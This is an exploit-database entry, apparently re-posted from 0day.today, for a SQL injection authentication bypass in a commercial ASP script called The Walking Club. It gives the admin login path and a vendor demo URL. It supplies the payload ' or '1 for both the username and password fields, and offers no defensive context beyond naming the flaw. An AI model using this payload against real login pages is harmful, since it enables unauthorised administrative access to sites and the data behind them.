id: 4687
date: 01/16/2009
title: The Walking Club (Auth Bypass) SQL Injection Vulnerability
author: ByALBAYX
cves: 

==========================================================
The Walking Club (Auth Bypass) SQL Injection Vulnerability
==========================================================


#############################################
[~]Author   : ByALBAYX
#############################################
[~]The Walking Club (Auth Bypass)

[~]Script        : The Walking Club

[~]Price         : $39   :) 

[~]Demo          : http://warhound.com/ASP/walking/login.aspx

[~]Details       : http://warhound.com/asp/products.htm
#############################################
[~]Admin     :  [PATH] /walking/login.aspx

[~]username  : ' or '1

[~]password  : ' or '1
#############################################



#  0day.today [2023-03-26]  #